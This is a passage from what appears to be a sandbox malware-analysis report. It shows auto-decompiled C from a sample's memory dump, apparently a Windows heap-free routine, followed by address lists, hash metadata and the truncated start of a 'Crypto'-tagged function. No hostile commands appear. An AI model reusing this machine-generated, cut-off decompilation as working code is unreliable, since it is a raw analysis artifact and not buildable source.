						if(_t254 != 0) {
							__eflags = _a4 & 0x10000000;
							if((_a4 & 0x10000000) == 0) {
								E3294E8B1(_t535, _v20);
							}
						}
						goto L7;
					}
					__eflags =  *(__ecx + 0x48) & 0x00000001;
					if(__eflags == 0) {
						__eflags = __edx & 0x00000007;
						if((__edx & 0x00000007) != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(__edx);
							_t387 = 9;
							L32955FED(_t387, __ecx);
						} else {
							_t518 = __edx - 8;
							__eflags =  *(_t518 + 7) - 5;
							if( *(_t518 + 7) == 5) {
								_t518 = _t518 - (( *(_t518 + 6) & 0x000000ff) << 3);
								__eflags = _t518;
							}
							__eflags =  *(_t518 + 7) & 0x0000003f;
							if(( *(_t518 + 7) & 0x0000003f) == 0) {
								_push(_t378);
								_push(_t378);
								_push(_t378);
								_push(_t518);
								_push("true");
								_pop(_t463);
								L32955FED(_t463, _t535);
								_t518 = _t378;
							}
						}
					} else {
						_t518 = E3288A4D2(0, __ecx, __edx, 0, __ecx, __eflags);
					}
					__eflags = _t518;
					if(_t518 != 0) {
						_t249 = _v20;
						__eflags =  *((char*)(_t249 - 1)) - 5;
						if( *((char*)(_t249 - 1)) != 5) {
							L59:
							__eflags =  *(_t518 + 7) - _t378;
							if( *(_t518 + 7) >= _t378) {
								goto L148;
							}
							_t392 = _t518 >> 0x00000003 ^  *_t518 ^  *0x32986964 ^ _t535;
							__eflags = _t392;
							if(_t392 != 0) {
								L146:
								_push(_t378);
								_push(_t378);
								_push(_t378);
								_push(_t518);
								_t393 = 3;
								L32955FED(_t393, _t535);
								L65:
								_t519 = 1;
								goto L149;
							}
							_t395 =  *(_t518 - (_t392 >> 0xd));
							_v16 = _t395;
							__eflags = _t395;
							if(_t395 == 0) {
								goto L146;
							}
							_t536 =  *(_t395 + 4);
							_t476 =  *(_t518 + 4) >> 0x00000008 & 0x0000ffff;
							_v24 = _t536;
							_v32 = _t378;
							_v36 = _t476;
							_t396 =  *( *((intOrPtr*)( *_t395)) + 0xc);
							_v44 = _t396;
							_t267 =  *(_t536 + 0x10) ^ _t396 ^ _t536 ^  *0x32986964;
							__eflags = (_t267 & 0x0000ffff) + (_t267 >> 0x10) * _t476 + _v24 - _t518;
							if((_t267 & 0x0000ffff) + (_t267 >> 0x10) * _t476 + _v24 == _t518) {
								_t270 = L328A3C40();
								__eflags = _t270;
								if(_t270 == 0) {
									_t271 = 0x7ffe0380;
								} else {
									_t271 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								_t478 = 1;
								__eflags =  *_t271 - _t378;
								if( *_t271 != _t378) {
									_t271 =  *[fs:0x30];
									__eflags =  *(_t271 + 0x240) & 1;
									if(( *(_t271 + 0x240) & 1) != 0) {
										_t271 = E3294F247( *((intOrPtr*)(_v44 + 0xc)), _t518 + 8, 2);
										_t478 = 1;
										__eflags = 1;
									}
								}
								__eflags = _t478 -  *0x7ffe036a;
								_t397 = _t378;
								_v44 = _t397;
								asm("sbb eax, eax");
								_v48 = _t271 & 0x00000064;
								_t274 = _v16 + 0x10;
								_v40 = _t274;
								while(1) {
									_t541 =  *_t274;
									_t276 = _t541 >> 0x10;
									_v28 = _t541;
									__eflags = _t276 & 0x00008000;
									if((_t276 & 0x00008000) != 0) {
										goto L77;
									}
									asm("lock cmpxchg [esi], ecx");
									_t542 = _v28;
									__eflags = _t541 - _t542;
									if(_t541 == _t542) {
										L79:
										 *(_t518 + 7) = 0x80;
										__eflags = _t542 - 0xffffffff;
										if(_t542 != 0xffffffff) {
											_t521 = _v16;
											asm("btr [eax], ecx");
											__eflags =  *((intOrPtr*)(_t521 + 0xc)) - _t378;
											if( *((intOrPtr*)(_t521 + 0xc)) == _t378) {
												L88:
												_t281 = (_t542 & 0x0000ffff) + _v32 + 0x00000001 | _v36 << 0x00000010;
												_t545 =  *_t521;
												__eflags = _t281 -  *(_t521 + 0x18);
												if(_t281 !=  *(_t521 + 0x18)) {
													L127:
													 *(_t521 + 0x10) = _t281;
													_t282 =  *(_t521 + 0x1c);
													__eflags = _t282 & 0x00000002;
													if((_t282 & 0x00000002) != 0) {
														L64:
														_t535 = _v12;
														goto L65;
													}
													_t283 = E328A3AF6(_t545, _t521);
													__eflags = _t283;
													if(_t283 == 0) {
														goto L64;
													}
													_t546 = _t521 + 0x1c;
													while(1) {
														_t480 =  *_t546;
														__eflags = _t480;
														if(_t480 == 0) {
															goto L64;
														}
														__eflags = _t480 & 0x00000002;
														if((_t480 & 0x00000002) != 0) {
															goto L64;
														}
														asm("lock cmpxchg [esi], ecx");
														__eflags = _t480 - _t480;
														if(_t480 != _t480) {
															continue;
														}
														_t406 =  *_t521;
														_t547 = _t378;
														_v40 = _t406;
														do {
															_t289 = _t406 + ((( *(_t406 + 0x5e) & 0x0000ffff) + _t547 & 0x0000000f) + 2) * 4;
															_t481 =  *_t289;
															_v44 = _t289;
															__eflags = _t481;
															if(_t481 != 0) {
																_t290 =  *(_t481 + 0x1c);
																__eflags = _t290 & 0x00000001;
																if((_t290 & 0x00000001) != 0) {
																	goto L140;
																}
																asm("lock cmpxchg [edi], ecx");
																_t521 = _v16;
																__eflags = _t481 - _t481;
																if(_t481 == _t481) {
																	_t523 = 0xfffffffd;
																	_t295 =  *(_t481 + 0x1c);
																	do {
																		__eflags = _t295 & _t523;
																		asm("lock cmpxchg [esi], ecx");
																	} while ((_t295 & _t523) != 0);
																	__eflags = _t295 - 2;
																	if(_t295 != 2) {
																		goto L64;
																	}
																	_t409 =  *( *_t481);
																	 *_t481 = _t378;
																	_t483 = _t481 + 0x20;
																	L81:
																	E328A20E0(_t409, _t483);
																	goto L64;
																}
																L139:
																_t406 = _v40;
																goto L140;
															}
															asm("lock cmpxchg [edx], ecx");
															__eflags = 0;
															if(0 == 0) {
																goto L64;
															}
															goto L139;
															L140:
															_t547 = _t547 + 1;
															__eflags = _t547 - 0x10;
														} while (_t547 < 0x10);
														_t235 =  *_t521 + 0x5c; // 0x56ff8bc3
														_t483 = _t521 + 0x20;
														_t409 =  *((intOrPtr*)( *((intOrPtr*)( *( *_t521) + 0xc)) + 0x3c0 + ( *_t235 & 0x0000ffff) * 4)) + 0x48;
														goto L81;
													}
													goto L64;
												}
												_v36 =  *((intOrPtr*)( *_t545 + 0x10));
												_v44 = _t545[0x2c];
												_t417 = _t545[0x2a];
												__eflags = _t417 - _t478;
												if(_t417 != _t478) {
													L92:
													_t298 =  *_t521;
													_v44 = _t298;
													_t299 = _t298 + 4;
													_t550 =  *_t299;
													 *_t299 = 0;
													__eflags = _t550;
													if(_t550 == 0) {
														L118:
														__eflags =  *(_t521 + 0x16) & 0x00000003;
														_t551 =  *( *_v44 + 0xc);
														_v44 =  *( *_v44 + 0xc);
														_v48 =  *_t521;
														if(( *(_t521 + 0x16) & 0x00000003) != 0) {
															_v56 =  *((intOrPtr*)(_t521 + 4)) + 0x0000101f & 0xfffff000;
															_t315 = E32950E2D(_t521);
															_push( &_v60);
															_t425 = ( *(_t521 + 0x18) & 0x0000ffff) * (_t315 & 0x0000ffff) << 3;
															__eflags = _t425;
															_v52 = _t425;
															_t318 = E3288F0E1( *((intOrPtr*)(_t551 + 0xc)), _t478);
															_t417 = _t425;
															_push(_t318);
															_push( &_v52);
															_push( &_v56);
															_push(0xffffffff);
															E328D2EB0();
														}
														 *( *((intOrPtr*)(_t521 + 4)) + 0xc) = _t378;
														E328A252B(_t551,  *((intOrPtr*)(_t521 + 4)), _t417);
														_t305 =  *(_t521 + 0x18) & 0x0000ffff;
														_v36 = _t305;
														_t307 = _v48 + 0x50;
														__eflags = _t307;
														_v36 =  ~_t305;
														_v32 = _t307;
														goto L121;
														do {
															do {
																L121:
																_t552 =  *_t307;
																_t486 =  *((intOrPtr*)(_t307 + 4));
																_v48 = _t486;
																asm("lock cmpxchg8b [edi]");
																__eflags = _t552 - _t552;
																_t307 = _v32;
															} while (_t552 != _t552);
															__eflags = _t486 - _v48;
														} while (_t486 != _v48);
														_t527 = _v16;
														_t378 = 0;
														__eflags = 0;
														 *((intOrPtr*)(_t527 + 4)) = 0;
														asm("lock inc dword [eax+0x20]");
														 *((intOrPtr*)(_t527 + 0x10)) = 0;
														_t553 = 0xfffffffe;
														_t310 =  *(_t527 + 0x1c);
														do {
															__eflags = _t310 & _t553;
															asm("lock cmpxchg [edx], ecx");
														} while ((_t310 & _t553) != 0);
														__eflags = _t310 - 1;
														if(_t310 != 1) {
															goto L64;
														}
														_t483 = _t527 + 0x20;
														_t409 =  *((intOrPtr*)( *_t527));
														 *_t527 = 0;
														goto L81;
													}
													_t528 = 0xfffffff9;
													_t322 =  *(_t550 + 0x1c);
													do {
														__eflags = _t322 & _t528;
														asm("lock cmpxchg [edx], ecx");
													} while ((_t322 & _t528) != 0);
													_t521 = _v16;
													__eflags = _t322 - 6;
													if(_t322 != 6) {
														_t417 = _v44;
														_t323 = E328A3AF6(_v44, _t550);
														__eflags = _t323;
														if(_t323 == 0) {
															L117:
															_t478 = 1;
															__eflags = 1;
															goto L118;
														} else {
															goto L98;
														}
														while(1) {
															L98:
															_t491 =  *(_t550 + 0x1c);
															__eflags = _t491;
															if(_t491 == 0) {
																goto L117;
															}
															__eflags = _t491 & 0x00000002;
															if((_t491 & 0x00000002) != 0) {
																goto L117;
															}
															_t417 = _t491 | 0x00000002;
															asm("lock cmpxchg [edi], ecx");
															_t521 = _v16;
															__eflags = _t491 - _t491;
															if(_t491 != _t491) {
																continue;
															}
															_t492 =  *_t550;
															_t430 = _t378;
															_v40 = _t492;
															_v36 = _t378;
															while(1) {
																_t154 = _t492 + 0x5e; // 0xf28b56ff
																_t494 = _t492 + (( *_t154 & 0x0000ffff) + _t430 & 0x0000000f) * 4 + 8;
																_v48 = _t494;
																_t328 =  *_t494;
																_v32 = _t328;
																__eflags = _t328;
																if(_t328 != 0) {
																	goto L105;
																}
																_t417 = _t550;
																asm("lock cmpxchg [edx], ecx");
																__eflags = _t328;
																if(_t328 == 0) {
																	goto L117;
																}
																L107:
																_t430 = _v36;
																L108:
																_t430 = _t430 + 1;
																_v36 = _t430;
																__eflags = _t430 - 0x10;
																if(_t430 >= 0x10) {
																	_t431 =  *_t550;
																	_t417 =  *((intOrPtr*)( *((intOrPtr*)( *_t431 + 0xc)) + 0x3c0 + ( *(_t431 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
																	__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t431 + 0xc)) + 0x3c0 + ( *(_t431 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
																	L115:
																	_t497 = _t550 + 0x20;
																	L116:
																	E328A20E0(_t417, _t497);
																	goto L117;
																}
																_t492 = _v40;
																continue;
																L105:
																_t329 = _t328 + 0x1c;
																_v28 = _t329;
																_t478 = 1;
																_t330 =  *_t329;
																__eflags = 1 & _t330;
																if((1 & _t330) != 0) {
																	goto L108;
																}
																asm("lock cmpxchg [edi], ecx");
																_t521 = _v16;
																__eflags = _v32 - _v32;
																if(_v32 == _v32) {
																	_t531 = 0xfffffffd;
																	_t335 =  *_v28;
																	do {
																		_t417 = _t335 & _t531;
																		__eflags = _t417;
																		asm("lock cmpxchg [esi], ecx");
																	} while (_t417 != 0);
																	_t521 = _v16;
																	__eflags = _t335 - 2;
																	if(_t335 != 2) {
																		goto L118;
																	}
																	_t498 = _v32;
																	_t417 =  *( *_t498);
																	 *_t498 = _t378;
																	_t497 = _t498 + 0x20;
																	goto L116;
																}
																goto L107;
															}
														}
														goto L117;
													}
													_t417 =  *( *_t550);
													 *_t550 = _t378;
													goto L115;
												}
												_t417 = _v36;
												__eflags = _t417 - _v44;
												if(_t417 < _v44) {
													goto L92;
												}
												_v36 = _t417 - _v44;
												_t417 =  *_t545;
												__eflags = _v36 -  *((intOrPtr*)(_t417 + 0x14));
												_t521 = _v16;
												if(_v36 <  *((intOrPtr*)(_t417 + 0x14))) {
													goto L127;
												}
												goto L92;
											}
											_t118 = _t521 + 8; // -16
											_t499 = E3291E9F6(_t118);
											__eflags = _t499;
											if(_t499 == 0) {
												L87:
												_t478 = 1;
												__eflags = 1;
												goto L88;
											}
											_t555 = _v32;
											do {
												_t437 =  *(_t499 - 4);
												_t499 =  *_t499;
												asm("btr [eax], edi");
												_t555 = _t555 + 1;
												_v36 = _t437 >> 0x00000008 & 0x0000ffff;
												__eflags = _t499;
											} while (_t499 != 0);
											_t521 = _v16;
											_t378 = 0;
											__eflags = 0;
											_v32 = _t555;
											_t542 = _v28;
											goto L87;
										}
										_t483 = _t518 + 8;
										_t409 = _v16 + 8;
										goto L81;
									}
									_t397 = _v44;
									L77:
									_t397 = _t397 + 1;
									_v44 = _t397;
									__eflags = _t397 - _v48;
									if(_t397 <= _v48) {
										_t274 = _v40;
										continue;
									}
									_t542 = _t541 | 0xffffffff;
									__eflags = _t542;
									_v28 = _t542;
									goto L79;
								}
							}
							_push(_t378);
							_push(_t378);
							_push(_t378);
							_push(_t518);
							_t442 = 3;
							L32955FED(_t442,  *((intOrPtr*)(_t396 + 0xc)));
							goto L64;
						}
						__eflags =  *(_t518 + 7) - _t378;
						if(__eflags >= 0) {
							__eflags =  *(_t535 + 0x4c) - _t378;
							if( *(_t535 + 0x4c) == _t378) {
								L34:
								_t344 = 1;
								L35:
								_v5 = _t344;
								_v6 = _t344;
								__eflags = _t344;
								if(_t344 == 0) {
									L29:
									_t504 = _v20;
									L30:
									_push(_t378);
									_push(_t378);
									_push(_t504);
									_push(_t518);
									_t443 = 3;
									L32955FED(_t443, _t535);
									__eflags = _v5 - _t378;
									if(_v5 == _t378) {
										goto L22;
									}
									L31:
									__eflags = _a4 & 0x3c000102;
									_t48 = _v20 - 8; // 0x32986d44
									_t444 = _t48;
									_v44 =  *_t444;
									if((_a4 & 0x3c000102) != 0) {
										goto L59;
									}
									__eflags = _t444[3] - 5;
									if(_t444[3] != 5) {
										_t445 = _t378;
									} else {
										_t51 =  &(_t444[3]); // 0x97ee
										_t249 = _v20;
										_t445 = _t444 - (( *_t51 & 0x000000ff) << 3) + 8;
									}
									_t348 = E329378DE(_v44, _t535, _t249, 3, _t445);
									__eflags = _t348;
									if(_t348 < 0) {
										goto L22;
									} else {
										_t249 = _v20;
										goto L59;
									}
								}
								__eflags =  *(_t518 + 7) - _t378;
								if( *(_t518 + 7) >= _t378) {
									__eflags =  *(_t535 + 0x4c) - _t378;
									if( *(_t535 + 0x4c) == _t378) {
										_t351 =  *_t518 & 0x0000ffff;
									} else {
										_t359 =  *_t518;
										__eflags =  *(_t535 + 0x4c) & _t359;
										if(( *(_t535 + 0x4c) & _t359) != 0) {
											_t359 = _t359 ^  *(_t535 + 0x50);
											__eflags = _t359;
										}
										_t351 = _t359 & 0x0000ffff;
									}
								} else {
									_t456 = _t518 >> 0x00000003 ^  *_t518 ^  *0x32986964 ^ _t535;
									__eflags = _t456;
									if(_t456 == 0) {
										_t361 = _t518 - (_t456 >> 0xd);
										__eflags = _t361;
										_t362 =  *_t361;
									} else {
										_t362 = _t378;
									}
									_t351 =  *((intOrPtr*)(_t362 + 0x14));
								}
								__eflags =  *(_t518 + 7) - 4;
								_t509 = _t351 & 0xffff;
								if( *(_t518 + 7) != 4) {
									_t449 = _t509 << 3;
									__eflags = _t449;
								} else {
									__eflags =  *(_t535 + 0x4c) - _t378;
									if( *(_t535 + 0x4c) == _t378) {
										_t356 =  *_t518 & 0x0000ffff;
									} else {
										_t358 =  *_t518;
										__eflags =  *(_t535 + 0x4c) & _t358;
										if(( *(_t535 + 0x4c) & _t358) != 0) {
											_t358 = _t358 ^  *(_t535 + 0x50);
											__eflags = _t358;
										}
										_t356 = _t358 & 0x0000ffff;
									}
									_t449 =  *((intOrPtr*)(_t518 - 8)) - (_t356 & 0x0000ffff) + _t509;
								}
								_t504 = _v20;
								_t353 = _t449 + _t518;
								__eflags = _t353 - _t504;
								asm("sbb al, al");
								_t355 =  !_t353 & _v6;
								__eflags = _t355;
								_v5 = _t355;
								if(_t355 != 0) {
									goto L31;
								} else {
									goto L30;
								}
							}
							_t363 =  *_t518;
							_t511 =  *(_t535 + 0x50) ^ _t363;
							_v68 = _t363;
							_v68 = _t511;
							__eflags = _t511 >> 0x18 - (_t511 >> 0x00000010 ^ _t511 >> 0x00000008 ^ _t511);
							if(_t511 >> 0x18 == (_t511 >> 0x00000010 ^ _t511 >> 0x00000008 ^ _t511)) {
								goto L34;
							}
							_v5 = _t378;
							goto L29;
						}
						_t344 = L32951F59(_t378, _t535, _t518, _t518, _t535, __eflags);
						goto L35;
					} else {
						L22:
						 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000000d;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E328BABA0(0xc000000d);
						_t519 = _t378;
						goto L7;
					}
				} else {
					if(( *0x329838c0 & 0x00000002) != 0 && __edx != 0) {
						_t378 =  *(__edx - 8);
						_v20 = __edx - _t378;
					}
					_t370 = E3293D8D2(_a4);
					_t534 = _v20;
					_t372 = E329586A8(_t535, _v20, _t370 & 0x11000001, _a8, _a12);
					_v36 = _t372;
					if(_t372 != 0) {
						_t373 = _a8;
						__eflags = _t373;
						if(_t373 != 0) {
							 *_t373 =  *_t373 - _t378;
							__eflags =  *_t373;
						}
						_t374 = L328A3C20(_t535);
						__eflags = _t374;
						if(_t374 != 0) {
							E3294E8B1(_t535, _t534);
						}
					} else {
						 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000000d;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E328BABA0(0xc000000d);
					}
					_t519 = _v36;
					L7:
					return _t519;
				}
			}

0x328e7184
0x328e7186
0x328e7188
0x328e718a
0x328e718e
0x328e7191
0x328e719a
0x328e7229
0x328e7233
0x328e78ef
0x328e78f8
0x328e78fd
0x328e7900
0x328e7902
0x00000000
0x00000000
0x328e7908
0x328e7908
0x328e790b
0x328e790d
0x328e790f
0x328e7911
0x328e7911
0x328e7914
0x328e7917
0x328e7919
0x328e791b
0x328e791b
0x328e791f
0x328e7924
0x328e7926
0x328e792c
0x328e7933
0x328e793e
0x328e793e
0x328e7933
0x00000000
0x328e7926
0x328e7239
0x328e723d
0x328e724a
0x328e724c
0x328e7278
0x328e7279
0x328e727a
0x328e727b
0x328e7280
0x328e7281
0x328e724e
0x328e724e
0x328e7251
0x328e7255
0x328e725e
0x328e725e
0x328e725e
0x328e7260
0x328e7264
0x328e7266
0x328e7267
0x328e7268
0x328e7269
0x328e726a
0x328e726e
0x328e726f
0x328e7274
0x328e7274
0x328e7264
0x328e723f
0x328e7246
0x328e7246
0x328e7286
0x328e7288
0x328e72b2
0x328e72b5
0x328e72b9
0x328e7404
0x328e7404
0x328e7407
0x00000000
0x328e78ec
0x328e741a
0x328e741c
0x328e741f
0x328e78d9
0x328e78d9
0x328e78da
0x328e78db
0x328e78dc
0x328e78e1
0x328e78e2
0x328e748b
0x328e748d
0x00000000
0x328e748d
0x328e742c
0x328e742e
0x328e7431
0x328e7433
0x00000000
0x00000000
0x328e743c
0x328e7442
0x328e7447
0x328e744a
0x328e744d
0x328e7452
0x328e745a
0x328e745f
0x328e7475
0x328e7477
0x328e7493
0x328e7498
0x328e749a
0x328e74ac
0x328e749c
0x328e74a5
0x328e74a5
0x328e74b3
0x328e74b4
0x328e74b6
0x328e74b8
0x328e74be
0x328e74c4
0x328e74d1
0x328e74d8
0x328e74d8
0x328e74d8
0x328e74c4
0x328e74d9
0x328e74e0
0x328e74e2
0x328e74e5
0x328e74ea
0x328e74f0
0x328e74f3
0x328e74fb
0x328e74fb
0x328e74ff
0x328e7502
0x328e7505
0x328e750a
0x00000000
0x00000000
0x328e7519
0x328e751d
0x328e7520
0x328e7522
0x328e7536
0x328e7536
0x328e753a
0x328e753d
0x328e7555
0x328e755e
0x328e7561
0x328e7565
0x328e75a2
0x328e75b1
0x328e75b3
0x328e75b5
0x328e75b9
0x328e77f9
0x328e77f9
0x328e77fc
0x328e77ff
0x328e7801
0x328e7488
0x328e7488
0x00000000
0x328e7488
0x328e780b
0x328e7810
0x328e7812
0x00000000
0x00000000
0x328e7818
0x328e781b
0x328e781b
0x328e781d
0x328e781f
0x00000000
0x00000000
0x328e7825
0x328e7828
0x00000000
0x00000000
0x328e7835
0x328e7839
0x328e783b
0x00000000
0x00000000
0x328e783d
0x328e783f
0x328e7841
0x328e7844
0x328e7850
0x328e7853
0x328e7855
0x328e7858
0x328e785a
0x328e7871
0x328e7874
0x328e7876
0x00000000
0x00000000
0x328e787f
0x328e7883
0x328e7886
0x328e7888
0x328e78b2
0x328e78b6
0x328e78b8
0x328e78ba
0x328e78bc
0x328e78bc
0x328e78c2
0x328e78c5
0x00000000
0x00000000
0x328e78cd
0x328e78cf
0x328e78d1
0x328e7548
0x328e7548
0x00000000
0x328e7548
0x328e788a
0x328e788a
0x00000000
0x328e788a
0x328e7863
0x328e7867
0x328e7869
0x00000000
0x00000000
0x00000000
0x328e788d
0x328e788d
0x328e788e
0x328e788e
0x328e789a
0x328e78a5
0x328e78a8
0x00000000
0x328e78a8
0x00000000
0x328e781b
0x328e75c4
0x328e75ca
0x328e75cd
0x328e75d0
0x328e75d2
0x328e75f3
0x328e75f3
0x328e75f7
0x328e75fa
0x328e75fd
0x328e75fd
0x328e75ff
0x328e7601
0x328e7714
0x328e7714
0x328e771d
0x328e7722
0x328e7725
0x328e7728
0x328e7739
0x328e773c
0x328e774e
0x328e774f
0x328e774f
0x328e7752
0x328e7759
0x328e775e
0x328e775f
0x328e7763
0x328e7767
0x328e7768
0x328e776a
0x328e776a
0x328e7775
0x328e777b
0x328e7780
0x328e7784
0x328e778e
0x328e778e
0x328e7791
0x328e7794
0x328e7794
0x328e7797
0x328e7797
0x328e7797
0x328e7797
0x328e7799
0x328e779e
0x328e77ab
0x328e77b2
0x328e77b4
0x328e77b4
0x328e77b9
0x328e77b9
0x328e77be
0x328e77c1
0x328e77c1
0x328e77c6
0x328e77c9
0x328e77cf
0x328e77d5
0x328e77d6
0x328e77d8
0x328e77da
0x328e77dc
0x328e77dc
0x328e77e2
0x328e77e5
0x00000000
0x00000000
0x328e77ed
0x328e77f0
0x328e77f2
0x00000000
0x328e77f2
0x328e760c
0x328e760d
0x328e760f
0x328e7611
0x328e7613
0x328e7613
0x328e7619
0x328e761c
0x328e761f
0x328e762c
0x328e7631
0x328e7636
0x328e7638
0x328e7711
0x328e7713
0x328e7713
0x00000000
0x00000000
0x00000000
0x00000000
0x328e763e
0x328e763e
0x328e763e
0x328e7641
0x328e7643
0x00000000
0x00000000
0x328e7649
0x328e764c
0x00000000
0x00000000
0x328e7657
0x328e765c
0x328e7660
0x328e7663
0x328e7665
0x00000000
0x00000000
0x328e7667
0x328e7669
0x328e766b
0x328e766e
0x328e7671
0x328e7671
0x328e767d
0x328e7680
0x328e7683
0x328e7685
0x328e7688
0x328e768a
0x00000000
0x00000000
0x328e768c
0x328e768e
0x328e7692
0x328e7694
0x00000000
0x00000000
0x328e76bb
0x328e76bb
0x328e76be
0x328e76be
0x328e76bf
0x328e76c2
0x328e76c5
0x328e76f4
0x328e7706
0x328e7706
0x328e7709
0x328e7709
0x328e770c
0x328e770c
0x00000000
0x328e770c
0x328e76c7
0x00000000
0x328e7698
0x328e7698
0x328e769d
0x328e76a0
0x328e76a1
0x328e76a3
0x328e76a5
0x00000000
0x00000000
0x328e76af
0x328e76b3
0x328e76b6
0x328e76b9
0x328e76d1
0x328e76d2
0x328e76d4
0x328e76d6
0x328e76d6
0x328e76d8
0x328e76d8
0x328e76de
0x328e76e1
0x328e76e4
0x00000000
0x00000000
0x328e76e6
0x328e76eb
0x328e76ed
0x328e76ef
0x00000000
0x328e76ef
0x00000000
0x328e76b9
0x328e7671
0x00000000
0x328e763e
0x328e7623
0x328e7625
0x00000000
0x328e7625
0x328e75d4
0x328e75d7
0x328e75da
0x00000000
0x00000000
0x328e75df
0x328e75e2
0x328e75e7
0x328e75ea
0x328e75ed
0x00000000
0x00000000
0x00000000
0x328e75ed
0x328e7567
0x328e756f
0x328e7571
0x328e7573
0x328e759f
0x328e75a1
0x328e75a1
0x00000000
0x328e75a1
0x328e7578
0x328e757b
0x328e757b
0x328e7581
0x328e7589
0x328e758c
0x328e758d
0x328e7590
0x328e7590
0x328e7594
0x328e7597
0x328e7597
0x328e7599
0x328e759c
0x00000000
0x328e759c
0x328e7542
0x328e7545
0x00000000
0x328e7545
0x328e7524
0x328e7527
0x328e7527
0x328e7528
0x328e752b
0x328e752e
0x328e74f8
0x00000000
0x328e74f8
0x328e7530
0x328e7530
0x328e7533
0x00000000
0x328e7533
0x328e74fb
0x328e747c
0x328e747d
0x328e747e
0x328e747f
0x328e7482
0x328e7483
0x00000000
0x328e7483
0x328e72bf
0x328e72c2
0x328e72cf
0x328e72d2
0x328e7349
0x328e7349
0x328e734b
0x328e734b
0x328e734e
0x328e7351
0x328e7353
0x328e72f9
0x328e72f9
0x328e72fc
0x328e72fc
0x328e72fd
0x328e72fe
0x328e72ff
0x328e7304
0x328e7305
0x328e730a
0x328e730d
0x00000000
0x00000000
0x328e7313
0x328e7313
0x328e731d
0x328e731d
0x328e7322
0x328e7325
0x00000000
0x00000000
0x328e732b
0x328e732f
0x328e73e9
0x328e7335
0x328e7335
0x328e733e
0x328e7341
0x328e7341
0x328e73f4
0x328e73f9
0x328e73fb
0x00000000
0x328e7401
0x328e7401
0x00000000
0x328e7401
0x328e73fb
0x328e7355
0x328e7358
0x328e7381
0x328e7384
0x328e7395
0x328e7386
0x328e7386
0x328e7388
0x328e738b
0x328e738d
0x328e738d
0x328e738d
0x328e7390
0x328e7390
0x328e735a
0x328e7367
0x328e7369
0x328e736c
0x328e7377
0x328e7377
0x328e7379
0x328e736e
0x328e736e
0x328e736e
0x328e737b
0x328e737b
0x328e7398
0x328e739f
0x328e73a2
0x328e73c9
0x328e73c9
0x328e73a4
0x328e73a4
0x328e73a7
0x328e73b8
0x328e73a9
0x328e73a9
0x328e73ab
0x328e73ae
0x328e73b0
0x328e73b0
0x328e73b0
0x328e73b3
0x328e73b3
0x328e73c3
0x328e73c3
0x328e73cc
0x328e73cf
0x328e73d2
0x328e73d4
0x328e73d8
0x328e73d8
0x328e73db
0x328e73de
0x00000000
0x328e73e4
0x00000000
0x328e73e4
0x328e73de
0x328e72d4
0x328e72d9
0x328e72db
0x328e72e0
0x328e72f2
0x328e72f4
0x00000000
0x00000000
0x328e72f6
0x00000000
0x328e72f6
0x328e72c8
0x00000000
0x328e728a
0x328e728a
0x328e729d
0x328e72a8
0x328e72ab
0x00000000
0x328e72ab
0x328e71a0
0x328e71a7
0x328e71ad
0x328e71b2
0x328e71b2
0x328e71be
0x328e71c3
0x328e71d0
0x328e71d5
0x328e71da
0x328e720a
0x328e720d
0x328e720f
0x328e7211
0x328e7211
0x328e7211
0x328e7215
0x328e721a
0x328e721c
0x328e7222
0x328e7222
0x328e71dc
0x328e71f0
0x328e71fb
0x328e71fb
0x328e71fe
0x328e7201
0x328e7207
0x328e7207

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 126bbc5338fa229e1d6ee5129d8221db907df6739b16843adefd39b6acac25ba
Instruction ID: df4857b987f20d8367db9d4b5f14648183eba1a2a91abdd1f8aec73f3ce3943c
Opcode Fuzzy Hash: 126bbc5338fa229e1d6ee5129d8221db907df6739b16843adefd39b6acac25ba
Instruction Fuzzy Hash: E742B579A006168FEB08CF59C8906AEB7B2FF8A354F54855DD957AB340DB34EC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 328BB1E0 Relevance: .6, Instructions: 629
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E328BB1E0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20) {
				char _v8;
				signed int _v12;
				char _v20;
				signed int _v29;
				char _v30;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* __ebx;
				void* __ebp;
				signed int _t232;
				intOrPtr _t235;
				signed int _t236;
				signed int _t241;
				short* _t255;
				short* _t259;
				short* _t260;
				signed int _t261;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t282;
				void* _t284;
				signed int _t299;
				intOrPtr _t311;
				intOrPtr _t319;
				signed int _t322;
				signed int _t324;
				signed int _t327;
				signed short* _t334;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				intOrPtr _t344;
				signed int _t346;
				signed int _t350;
				signed int _t355;
				signed int _t356;
				intOrPtr _t357;
				signed int _t359;
				short* _t361;
				void* _t362;
				signed int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				signed short _t378;
				intOrPtr _t380;
				intOrPtr _t383;
				intOrPtr _t384;
				signed int _t388;
				signed int _t389;
				void* _t390;
				signed int _t392;
				intOrPtr _t397;
				signed int _t400;
				short* _t401;
				signed int _t402;
				short* _t403;
				signed int _t406;
				signed int _t408;
				void* _t409;
				signed int _t414;
				signed int _t415;
				void* _t416;
				void* _t417;
				signed int _t418;
